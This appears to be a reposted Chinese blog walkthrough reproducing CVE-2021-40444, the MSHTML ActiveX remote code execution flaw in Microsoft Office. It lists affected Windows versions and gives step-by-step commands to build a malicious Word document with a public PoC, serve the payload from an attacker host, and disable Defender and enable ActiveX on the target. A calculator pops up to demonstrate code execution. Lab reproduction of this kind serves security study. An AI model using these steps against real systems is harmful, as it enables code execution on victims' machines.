漏洞概述:
2021年9月8日,微软发布安全通告披露了Microsoft MSHTML远程代码执行漏洞,攻击者可通过制作恶意的ActiveX控件供托管浏览器呈现引擎的 Microsoft Office文档使用,成功诱导用户打开恶意文档后,可在目标系统上以该用户权限执行任意代码,微软在通告中指出已检测到该漏洞被在野利用,请相关用户采取措施进行防护。
[
](https://blog.csdn.net/weixin_42345596/article/details/120327007)
MSHTML是微软旗下的Internet Explorer浏览器引擎,也用于Office应用程序,以在Word、Excel或PowerPoint文档中呈现Web托管的内容,AcitveX控件是微软COM架构下的产物,在Windows的Office套件、IE浏览器中有广泛的应用,利用ActiveX控件即可与MSHTML组件进行交互。
影响范围
Windows Server, version 20H2 (Server Core Installation)
Windows Server, version 2004 (Server Core installation)
Windows Server 2022 (Server Core installation)
Windows Server 2022
Windows Server 2019 (Server Core installation)
Windows Server 2019
Windows Server 2016 (Server Core installation)
Windows Server 2016
Windows Server 2012 R2 (Server Core installation)
Windows Server 2012 R2
Windows Server 2012 (Server Core installation)
Windows Server 2012
Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)
Windows Server 2008 for x64-based Systems Service Pack 2
Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)
Windows Server 2008 for 32-bit Systems Service Pack 2
Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
Windows Server 2008 R2 for x64-based Systems Service Pack 1
Windows RT 8.1
Windows 8.1 for x64-based systems
Windows 8.1 for 32-bit systems
Windows 7 for x64-based Systems Service Pack 1
Windows 7 for 32-bit Systems Service Pack 1
Windows 10 for x64-based Systems
Windows 10 for 32-bit Systems
Windows 10 Version 21H1 for x64-based Systems
Windows 10 Version 21H1 for ARM64-based Systems
Windows 10 Version 21H1 for 32-bit Systems
Windows 10 Version 20H2 for x64-based Systems
Windows 10 Version 20H2 for ARM64-based Systems
Windows 10 Version 20H2 for 32-bit Systems
Windows 10 Version 2004 for x64-based Systems
Windows 10 Version 2004 for ARM64-based Systems
Windows 10 Version 2004 for 32-bit Systems
Windows 10 Version 1909 for x64-based Systems
Windows 10 Version 1909 for ARM64-based Systems
Windows 10 Version 1909 for 32-bit Systems
Windows 10 Version 1809 for x64-based Systems
Windows 10 Version 1809 for ARM64-based Systems
Windows 10 Version 1809 for 32-bit Systems
Windows 10 Version 1607 for x64-based Systems
Windows 10 Version 1607 for 32-bit Systems
漏洞复现
复现环境: win10(office10) , kali
下载POChttps://github.com/lockedbyte/CVE-2021-40444
安装lcab包
wget http://ftp.debian.org/debian/pool/main/l/lcab/lcab_1.0b12.orig.tar.gz
tar zxvf lcab_1.0b12.orig.tar.gz
cd lcab-1.0b12
./configure
make
进入CVE-2021-40444-master目录
执行命令
python3 exploit.py generate test/calc.dll http://169.254.96.129:80
执行过后可以看到在out目录下生成了document.docx文件
开启http服务
python exploit.py host 80
配置靶机环境
靶机win10 关闭defender
win+R键 输入gpedit.msc
![3NMF5[0_}C7T0]Q9MBH]EZC.png](https://img-blog.csdnimg.cn/img_convert/861917e87ac5732a3e2d11c87c498365.png#clientId=ucc126c04-be4a-4&from=drop&id=u064615fe&margin=[object Object]&name=3NMF5[0_}C7T0]Q9MBH]EZC.png&originHeight=282&originWidth=669&originalType=binary&ratio=1&size=81040&status=done&style=none&taskId=u00265442-cf4b-473c-8c0d-1f5fbd1788c)
点管理模板->Windows组件->Windows Defender防病毒程序
双击关闭实时防护
点击启用
打开IE浏览器 设置找到Internet选项
点击安全
文章来源:https://www.toymoban.com/news/detail-530925.html
启用ActiveX 控件和插件
靶机环境配置完毕!
使用ftp把document.docx文件拉到桌面
ftp:// ip地址 /
下载office2010用来打开document文件
下载地址
https://www.cr173.com/soft/10289.html
下载完直接安装就行
用word打开document文件
可以看到 弹出了计算器窗口 说明代码执行了
查看攻击机 监听的80端口: 打开文件时请求了/word.html页面
文章来源地址https://www.toymoban.com/news/detail-530925.html
到了这里,关于CVE-2021-40444 Microsoft MSHTML RCE简单复现的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!
